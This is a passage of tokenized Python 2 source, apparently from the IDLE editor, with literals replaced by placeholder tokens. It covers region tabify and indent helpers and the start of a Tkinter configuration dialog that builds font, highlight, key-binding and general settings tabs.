<NUM_LIT:2> : ] <EOL> elif line [ : <NUM_LIT:1> ] == '<STR_LIT:#>' : <EOL> line = line [ <NUM_LIT:1> : ] <EOL> lines [ pos ] = line <EOL> self . set_region ( head , tail , chars , lines ) <EOL> def tabify_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> tabwidth = self . _asktabwidth ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> line = lines [ pos ] <EOL> if line : <EOL> raw , effective = classifyws ( line , tabwidth ) <EOL> ntabs , nspaces = divmod ( effective , tabwidth ) <EOL> lines [ pos ] = '<STR_LIT:\t>' * ntabs + '<STR_LIT:U+0020>' * nspaces + line [ raw : ] <EOL> self . set_region ( head , tail , chars , lines ) <EOL> def untabify_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> tabwidth = self . _asktabwidth ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> lines [ pos ] = lines [ pos ] . expandtabs ( tabwidth ) <EOL> self . set_region ( head , tail , chars , lines ) <EOL> def toggle_tabs_event ( self , event ) : <EOL> if self . askyesno ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" + ( "<STR_LIT>" , "<STR_LIT>" ) [ self . usetabs ] + <EOL> "<STR_LIT>" + <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) [ self . usetabs ] + "<STR_LIT>" + <EOL> "<STR_LIT>" , <EOL> parent = self . text ) : <EOL> self . usetabs = not self . usetabs <EOL> self . indentwidth = <NUM_LIT:8> <EOL> return "<STR_LIT>" <EOL> def change_indentwidth_event ( self , event ) : <EOL> new = self . askinteger ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> parent = self . text , <EOL> initialvalue = self . indentwidth , <EOL> minvalue = <NUM_LIT:2> , <EOL> maxvalue = <NUM_LIT:16> ) <EOL> if new and new != self . indentwidth and not self . usetabs : <EOL> self . indentwidth = new <EOL> return "<STR_LIT>" <EOL> def get_region ( self ) : <EOL> text = self . text <EOL> first , last = self . get_selection_indices ( ) <EOL> if first and last : <EOL> head = text . index ( first + "<STR_LIT>" ) <EOL> tail = text . index ( last + "<STR_LIT>" ) <EOL> else : <EOL> head = text . index ( "<STR_LIT>" ) <EOL> tail = text . index ( "<STR_LIT>" ) <EOL> chars = text . get ( head , tail ) <EOL> lines = chars . split ( "<STR_LIT:\n>" ) <EOL> return head , tail , chars , lines <EOL> def set_region ( self , head , tail , chars , lines ) : <EOL> text = self . text <EOL> newchars = "<STR_LIT:\n>" . join ( lines ) <EOL> if newchars == chars : <EOL> text . bell ( ) <EOL> return <EOL> text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> text . mark_set ( "<STR_LIT>" , head ) <EOL> text . undo_block_start ( ) <EOL> text . delete ( head , tail ) <EOL> text . insert ( head , newchars ) <EOL> text . undo_block_stop ( ) <EOL> text . tag_add ( "<STR_LIT>" , head , "<STR_LIT>" ) <EOL> def _make_blanks ( self , n ) : <EOL> if self . usetabs : <EOL> ntabs , nspaces = divmod ( n , self . tabwidth ) <EOL> return '<STR_LIT:\t>' * ntabs + '<STR_LIT:U+0020>' * nspaces <EOL> else : <EOL> return '<STR_LIT:U+0020>' * n <EOL> def reindent_to ( self , column ) : <EOL> text = self . text <EOL> text . undo_block_start ( ) <EOL> if text . compare ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> text . delete ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if column : <EOL> text . insert ( "<STR_LIT>" , self . _make_blanks ( column ) ) <EOL> text . undo_block_stop ( ) <EOL> def _asktabwidth ( self ) : <EOL> return self . askinteger ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> parent = self . text , <EOL> initialvalue = self . indentwidth , <EOL> minvalue = <NUM_LIT:2> , <EOL> maxvalue = <NUM_LIT:16> ) or self . tabwidth <EOL> def guess_indent ( self ) : <EOL> opener , indented = IndentSearcher ( self . text , self . tabwidth ) . run ( ) <EOL> if opener and indented : <EOL> raw , indentsmall = classifyws ( opener , self . tabwidth ) <EOL> raw , indentlarge = classifyws ( indented , self . tabwidth ) <EOL> else : <EOL> indentsmall = indentlarge = <NUM_LIT:0> <EOL> return indentlarge - indentsmall <EOL> def index2line ( index ) : <EOL> return int ( float ( index ) ) <EOL> def classifyws ( s , tabwidth ) : <EOL> raw = effective = <NUM_LIT:0> <EOL> for ch in s : <EOL> if ch == '<STR_LIT:U+0020>' : <EOL> raw = raw + <NUM_LIT:1> <EOL> effective = effective + <NUM_LIT:1> <EOL> elif ch == '<STR_LIT:\t>' : <EOL> raw = raw + <NUM_LIT:1> <EOL> effective = ( effective // tabwidth + <NUM_LIT:1> ) * tabwidth <EOL> else : <EOL> break <EOL> return raw , effective <EOL> import tokenize <EOL> _tokenize = tokenize <EOL> del tokenize <EOL> class IndentSearcher ( object ) : <EOL> def __init__ ( self , text , tabwidth ) : <EOL> self . text = text <EOL> self . tabwidth = tabwidth <EOL> self . i = self . finished = <NUM_LIT:0> <EOL> self . blkopenline = self . indentedline = None <EOL> def readline ( self ) : <EOL> if self . finished : <EOL> return "<STR_LIT>" <EOL> i = self . i = self . i + <NUM_LIT:1> <EOL> mark = repr ( i ) + "<STR_LIT>" <EOL> if self . text . compare ( mark , "<STR_LIT>" , "<STR_LIT:end>" ) : <EOL> return "<STR_LIT>" <EOL> return self . text . get ( mark , mark + "<STR_LIT>" ) <EOL> def tokeneater ( self , type , token , start , end , line , <EOL> INDENT = _tokenize . INDENT , <EOL> NAME = _tokenize . NAME , <EOL> OPENERS = ( '<STR_LIT:class>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if self . finished : <EOL> pass <EOL> elif type == NAME and token in OPENERS : <EOL> self . blkopenline = line <EOL> elif type == INDENT and self . blkopenline : <EOL> self . indentedline = line <EOL> self . finished = <NUM_LIT:1> <EOL> def run ( self ) : <EOL> save_tabsize = _tokenize . tabsize <EOL> _tokenize . tabsize = self . tabwidth <EOL> try : <EOL> try : <EOL> _tokenize . tokenize ( self . readline , self . tokeneater ) <EOL> except _tokenize . TokenError : <EOL> pass <EOL> finally : <EOL> _tokenize . tabsize = save_tabsize <EOL> return self . blkopenline , self . indentedline <EOL> def prepstr ( s ) : <EOL> i = s . find ( '<STR_LIT:_>' ) <EOL> if i >= <NUM_LIT:0> : <EOL> s = s [ : i ] + s [ i + <NUM_LIT:1> : ] <EOL> return i , s <EOL> keynames = { <EOL> '<STR_LIT>' : '<STR_LIT:[>' , <EOL> '<STR_LIT>' : '<STR_LIT:]>' , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> } <EOL> def get_accelerator ( keydefs , eventname ) : <EOL> keylist = keydefs . get ( eventname ) <EOL> if not keylist : <EOL> return "<STR_LIT>" <EOL> s = keylist [ <NUM_LIT:0> ] <EOL> s = re . sub ( r"<STR_LIT>" , lambda m : m . group ( ) . upper ( ) , s ) <EOL> s = re . sub ( r"<STR_LIT>" , lambda m : keynames . get ( m . group ( ) , m . group ( ) ) , s ) <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT>" , s ) <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT>" , s ) <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT>" , s ) <EOL> s = re . sub ( "<STR_LIT:->" , "<STR_LIT:+>" , s ) <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT:U+0020>" , s ) <EOL> s = re . sub ( "<STR_LIT:<>" , "<STR_LIT>" , s ) <EOL> s = re . sub ( "<STR_LIT:>>" , "<STR_LIT>" , s ) <EOL> return s <EOL> def fixwordbreaks ( root ) : <EOL> tk = root . tk <EOL> tk . call ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> tk . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> tk . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test ( ) : <EOL> root = Tk ( ) <EOL> fixwordbreaks ( root ) <EOL> root . withdraw ( ) <EOL> if sys . argv [ <NUM_LIT:1> : ] : <EOL> filename = sys . argv [ <NUM_LIT:1> ] <EOL> else : <EOL> filename = None <EOL> edit = EditorWindow ( root = root , filename = filename ) <EOL> edit . set_close_hook ( root . quit ) <EOL> root . mainloop ( ) <EOL> root . destroy ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) </s>
<s> """<STR_LIT>""" <EOL> from Tkinter import * <EOL> import tkMessageBox , tkColorChooser , tkFont <EOL> import string , copy <EOL> from configHandler import idleConf <EOL> from dynOptionMenuWidget import DynOptionMenu <EOL> from tabpage import TabPageSet <EOL> from keybindingDialog import GetKeysDialog <EOL> from configSectionNameDialog import GetCfgSectionNameDialog <EOL> from configHelpSourceEdit import GetHelpSourceDialog <EOL> class ConfigDialog ( Toplevel ) : <EOL> def __init__ ( self , parent , title ) : <EOL> Toplevel . __init__ ( self , parent ) <EOL> self . configure ( borderwidth = <NUM_LIT:5> ) <EOL> self . geometry ( "<STR_LIT>" % ( parent . winfo_rootx ( ) + <NUM_LIT:20> , <EOL> parent . winfo_rooty ( ) + <NUM_LIT:30> ) ) <EOL> self . themeElements = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:string>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:error>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> self . ResetChangedItems ( ) <EOL> self . CreateWidgets ( ) <EOL> self . resizable ( height = FALSE , width = FALSE ) <EOL> self . transient ( parent ) <EOL> self . grab_set ( ) <EOL> self . protocol ( "<STR_LIT>" , self . Cancel ) <EOL> self . parent = parent <EOL> self . tabPages . focus_set ( ) <EOL> self . LoadConfigs ( ) <EOL> self . AttachVarCallbacks ( ) <EOL> self . wait_window ( ) <EOL> def CreateWidgets ( self ) : <EOL> self . tabPages = TabPageSet ( self , <EOL> pageNames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . tabPages . ChangePage ( ) <EOL> frameActionButtons = Frame ( self ) <EOL> self . buttonHelp = Button ( frameActionButtons , text = '<STR_LIT>' , <EOL> command = self . Help , takefocus = FALSE ) <EOL> self . buttonOk = Button ( frameActionButtons , text = '<STR_LIT>' , <EOL> command = self . Ok , takefocus = FALSE ) <EOL> self . buttonApply = Button ( frameActionButtons , text = '<STR_LIT>' , <EOL> command = self . Apply , takefocus = FALSE ) <EOL> self . buttonCancel = Button ( frameActionButtons , text = '<STR_LIT>' , <EOL> command = self . Cancel , takefocus = FALSE ) <EOL> self . CreatePageFontTab ( ) <EOL> self . CreatePageHighlight ( ) <EOL> self . CreatePageKeys ( ) <EOL> self . CreatePageGeneral ( ) <EOL> self . buttonHelp . pack ( side = RIGHT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonOk . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonApply . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonCancel . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> frameActionButtons . pack ( side = BOTTOM ) <EOL> self . tabPages . pack ( side = TOP , expand = TRUE , fill = BOTH ) <EOL> def CreatePageFontTab ( self ) : <EOL> self . fontSize = StringVar ( self ) <EOL> self . fontBold = BooleanVar ( self ) <EOL> self . fontName = StringVar ( self ) <EOL> self . spaceNum = IntVar ( self ) <EOL> self . editFont = tkFont . Font ( self , ( '<STR_LIT>' , <NUM_LIT:10> , '<STR_LIT>' ) ) <EOL> frame = self . tabPages . pages [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> frameFont = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameIndent = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> labelFontTitle = Label ( frameFont , text = '<STR_LIT>' ) <EOL> frameFontName = Frame ( frameFont ) <EOL> frameFontParam = Frame ( frameFont ) <EOL> labelFontNameTitle = Label ( frameFontName , justify = LEFT , <EOL> text = '<STR_LIT>' ) <EOL> self . listFontName = Listbox ( frameFontName , height = <NUM_LIT:5> , takefocus = FALSE , <EOL> exportselection = FALSE ) <EOL> self . listFontName . bind ( '<STR_LIT>' , self . OnListFontButtonRelease ) <EOL> scrollFont = Scrollbar ( frameFontName ) <EOL> scrollFont . config ( command = self . listFontName . yview ) <EOL> self . listFontName . config ( yscrollcommand = scrollFont . set ) <EOL> labelFontSizeTitle = Label ( frameFontParam , text = '<STR_LIT>' ) <EOL> self . optMenuFontSize = DynOptionMenu ( frameFontParam , self . fontSize , None , <EOL> command = self . SetFontSample ) <EOL> checkFontBold = Checkbutton ( frameFontParam , variable = self . fontBold , <EOL> onvalue = <NUM_LIT:1> , offvalue = <NUM_LIT:0> , text = '<STR_LIT>' , command = self . SetFontSample ) <EOL> frameFontSample = Frame ( frameFont , relief = SOLID , borderwidth = <NUM_LIT:1> ) <EOL> self . labelFontSample = Label ( frameFontSample , <EOL> text = '<STR_LIT>' , <EOL> justify = LEFT , font = self . editFont ) <EOL> frameIndentSize = Frame ( frameIndent ) <EOL> labelSpaceNumTitle = Label ( frameIndentSize , justify = LEFT , <EOL> text = '<STR_LIT>' ) <EOL> self . scaleSpaceNum = Scale ( frameIndentSize , variable = self . spaceNum , <EOL> label = '<STR_LIT>' , orient = '<STR_LIT>' , <EOL> tickinterval = <NUM_LIT:2> , from_ = <NUM_LIT:2> , to = <NUM_LIT:16> ) <EOL> frameFont . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:10> , expand = TRUE , fill = BOTH ) <EOL> frameIndent . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:10> , fill = Y ) <EOL> labelFontTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> frameFontName . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameFontParam . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> labelFontNameTitle . pack ( side = TOP , anchor = W ) <EOL> self . listFontName . pack ( side = LEFT , expand = TRUE , fill = X ) <EOL> scrollFont . pack ( side = LEFT , fill = Y ) <EOL> labelFontSizeTitle . pack ( side = LEFT , anchor = W ) <EOL> self . optMenuFontSize . pack ( side = LEFT , anchor = W ) <EOL> checkFontBold . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:20> ) <EOL> frameFontSample . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> self . labelFontSample . pack ( expand = TRUE , fill = BOTH ) <EOL> frameIndentSize . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = BOTH ) <EOL> labelSpaceNumTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> ) <EOL> self . scaleSpaceNum . pack ( side = TOP , padx = <NUM_LIT:5> , fill = X ) <EOL> return frame <EOL> def CreatePageHighlight ( self ) : <EOL> self . builtinTheme = StringVar ( self ) <EOL> self . customTheme = StringVar ( self ) <EOL> self . fgHilite = BooleanVar ( self ) <EOL> self . colour = StringVar ( self ) <EOL> self . fontName = StringVar ( self ) <EOL> self . themeIsBuiltin = BooleanVar ( self ) <EOL> self . highlightTarget = StringVar ( self ) <EOL> frame = self . tabPages . pages [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> frameCustom = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameTheme = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> self . textHighlightSample = Text ( frameCustom , relief = SOLID , borderwidth = <NUM_LIT:1> , <EOL> font = ( '<STR_LIT>' , <NUM_LIT:12> , '<STR_LIT>' ) , cursor = '<STR_LIT>' , width = <NUM_LIT> , height = <NUM_LIT:10> , <EOL> takefocus = FALSE , highlightthickness = <NUM_LIT:0> , wrap = NONE ) <EOL> text = self . textHighlightSample <EOL> text . bind ( '<STR_LIT>' , lambda e : '<STR_LIT>' ) <EOL> text . bind ( '<STR_LIT>' , lambda e : '<STR_LIT>' ) <EOL> textAndTags = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:\n>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:\n>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT:string>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( "<STR_LIT>" , '<STR_LIT:string>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( "<STR_LIT>" , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( "<STR_LIT>" , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:list>' , '<STR_LIT>' ) , ( '<STR_LIT:(>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:None>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:error>' ) , ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:\n>' , '<STR_LIT>' ) ) <EOL> for txTa in textAndTags : <EOL> text . insert ( END , txTa [ <NUM_LIT:0> ] , txTa [ <NUM_LIT:1> ] ) <EOL> for element in self . themeElements . keys ( ) : <EOL> text . tag_bind ( self . themeElements [ element ] [ <NUM_LIT:0> ] , '<STR_LIT>' , <EOL> lambda event , elem = element : event . widget . winfo_toplevel ( ) <EOL> . highlightTarget . set ( elem ) ) <EOL> text . config ( state = DISABLED ) <EOL> self . frameColourSet = Frame ( frameCustom , relief = SOLID , borderwidth = <NUM_LIT:1> ) <EOL> frameFgBg = Frame ( frameCustom ) <EOL> labelCustomTitle = Label ( frameCustom , text = '<STR_LIT>' ) <EOL> buttonSetColour = Button ( self . frameColourSet , text = '<STR_LIT>' , <EOL> command = self . GetColour , highlightthickness = <NUM_LIT:0> ) <EOL> self . optMenuHighlightTarget = DynOptionMenu ( self . frameColourSet , <EOL> self . highlightTarget , None , highlightthickness = <NUM_LIT:0> ) <EOL> self . radioFg = Radiobutton ( frameFgBg , variable = self . fgHilite , <EOL> value = <NUM_LIT:1> , text = '<STR_LIT>' , command = self . SetColourSampleBinding ) <EOL> self . radioBg = Radiobutton ( frameFgBg , variable = self . fgHilite , <EOL> value = <NUM_LIT:0> , text = '<STR_LIT>' , command = self . SetColourSampleBinding ) <EOL> self . fgHilite . set ( <NUM_LIT:1> ) <EOL> buttonSaveCustomTheme = Button ( frameCustom , <EOL> text = '<STR_LIT>' , command = self . SaveAsNewTheme ) <EOL> labelThemeTitle = Label ( frameTheme , text = '<STR_LIT>' ) <EOL> labelTypeTitle = Label ( frameTheme , text = '<STR_LIT>' ) <EOL> self . radioThemeBuiltin = Radiobutton ( frameTheme , variable = self . themeIsBuiltin , <EOL> value = <NUM_LIT:1> , command = self . SetThemeType , text = '<STR_LIT>' ) <EOL> self . radioThemeCustom = Radiobutton ( frameTheme , variable = self . themeIsBuiltin , <EOL> value = <NUM_LIT:0> , command = self . SetThemeType , text = '<STR_LIT>' ) <EOL> self . optMenuThemeBuiltin = DynOptionMenu ( frameTheme , <EOL> self . builtinTheme , None , command = None ) <EOL> self . optMenuThemeCustom = DynOptionMenu ( frameTheme , <EOL> self . customTheme , None , command = None ) <EOL> self . buttonDeleteCustomTheme = Button ( frameTheme , text = '<STR_LIT>' , <EOL> command = self . DeleteCustomTheme ) <EOL> frameCustom . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:10> , expand = TRUE , fill = BOTH ) <EOL> frameTheme . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:10> , fill = Y ) <EOL> labelCustomTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . frameColourSet . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = X ) <EOL> frameFgBg . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:0> ) <EOL> self . textHighlightSample . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , <EOL> fill = BOTH ) <EOL> buttonSetColour . pack ( side = TOP , expand = TRUE , fill = X , padx = <NUM_LIT:8> , pady = <NUM_LIT:4> ) <EOL> self . optMenuHighlightTarget . pack ( side = TOP , expand = TRUE , fill = X , padx = <NUM_LIT:8> , pady = <NUM_LIT:3> ) <EOL> self . radioFg . pack ( side = LEFT , anchor = E ) <EOL> self . radioBg . pack ( side = RIGHT , anchor = W ) <EOL> buttonSaveCustomTheme . pack ( side = BOTTOM , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelThemeTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelTypeTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . radioThemeBuiltin . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> ) <EOL> self . radioThemeCustom . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:2> ) <EOL> self . optMenuThemeBuiltin . pack ( side = TOP , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . optMenuThemeCustom . pack ( side = TOP , fill = X , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonDeleteCustomTheme . pack ( side = TOP , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> return frame <EOL> def CreatePageKeys ( self ) : <EOL> self . bindingTarget = StringVar ( self ) <EOL> self . builtinKeys = StringVar ( self ) <EOL> self . customKeys = StringVar ( self ) <EOL> self . keysAreBuiltin = BooleanVar ( self ) <EOL> self . keyBinding = StringVar ( self ) <EOL> frame = self . tabPages . pages [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> frameCustom = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameKeySets = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameTarget = Frame ( frameCustom ) <EOL> labelCustomTitle = Label ( frameCustom , text = '<STR_LIT>' ) <EOL> labelTargetTitle = Label ( frameTarget , text = '<STR_LIT>' ) <EOL> scrollTargetY = Scrollbar ( frameTarget ) <EOL> scrollTargetX = Scrollbar ( frameTarget , orient = HORIZONTAL ) <EOL> self . listBindings = Listbox ( frameTarget , takefocus = FALSE , <EOL> exportselection = FALSE ) <EOL> self . listBindings . bind ( '<STR_LIT>' , self . KeyBindingSelected ) <EOL> scrollTargetY . config ( command = self . listBindings . yview ) <EOL> scrollTargetX . config ( command = self . listBindings . xview ) <EOL> self . listBindings . config ( yscrollcommand = scrollTargetY . set ) <EOL> self . listBindings . config ( xscrollcommand = scrollTargetX . set ) <EOL> self . buttonNewKeys = Button ( frameCustom , text = '<STR_LIT>' , <EOL> command = self . GetNewKeys , state = DISABLED ) <EOL> buttonSaveCustomKeys = Button ( frameCustom , <EOL> text = '<STR_LIT>' , command = self . SaveAsNewKeySet ) <EOL> labelKeysTitle = Label ( frameKeySets , text = '<STR_LIT>' ) <EOL> labelTypeTitle = Label ( frameKeySets , text = '<STR_LIT>' ) <EOL> self . radioKeysBuiltin = Radiobutton ( frameKeySets , variable = self . keysAreBuiltin , <EOL> value = <NUM_LIT:1> , command = self . SetKeysType , text = '<STR_LIT>' ) <EOL> self . radioKeysCustom = Radiobutton ( frameKeySets , variable = self . keysAreBuiltin , <EOL> value = <NUM_LIT:0> , command = self . SetKeysType , text = '<STR_LIT>' ) <EOL> self . optMenuKeysBuiltin = DynOptionMenu ( frameKeySets , <EOL> self . builtinKeys , None , command = None ) <EOL> self . optMenuKeysCustom = DynOptionMenu ( frameKeySets , <EOL> self . customKeys , None , command = None ) <EOL> self . buttonDeleteCustomKeys = Button ( frameKeySets , text = '<STR_LIT>' , <EOL> command = self . DeleteCustomKeys ) <EOL> frameCustom . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> frameKeySets . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = Y ) <EOL> labelCustomTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> buttonSaveCustomKeys . pack ( side = BOTTOM , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonNewKeys . pack ( side = BOTTOM , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> frameTarget . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> frameTarget . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> frameTarget . rowconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> labelTargetTitle . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = W ) <EOL> self . listBindings . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = NSEW ) <EOL> scrollTargetY . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = NS ) <EOL> scrollTargetX . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:0> , sticky = EW ) <EOL> labelKeysTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelTypeTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . radioKeysBuiltin . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> ) <EOL> self . radioKeysCustom . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:2> ) <EOL> self . optMenuKeysBuiltin . pack ( side = TOP , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . optMenuKeysCustom . pack ( side = TOP , fill = X , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonDeleteCustomKeys . pack ( side = TOP , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> return frame <EOL> def CreatePageGeneral ( self ) : <EOL> self . winWidth = StringVar ( self ) <EOL> self . winHeight = StringVar ( self ) <EOL> self . paraWidth = StringVar ( self ) <EOL> self . startupEdit = IntVar ( self ) <EOL> self . autoSave = IntVar ( self ) <EOL> self . encoding = StringVar ( self ) <EOL> self . userHelpBrowser = BooleanVar ( self ) <EOL> self . helpBrowser = StringVar ( self ) <EOL> frame = self . tabPages . pages [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> frameRun = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameSave = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameWinSize = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameParaSize = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameEncoding = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameHelp = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> labelRunTitle = Label ( frameRun , text = '<STR_LIT>' ) <EOL> labelRunChoiceTitle = Label ( frameRun , text = '<STR_LIT>' ) <EOL> radioStartupEdit = Radiobutton ( frameRun , variable = self . startupEdit , <EOL> value = <NUM_LIT:1> , command = 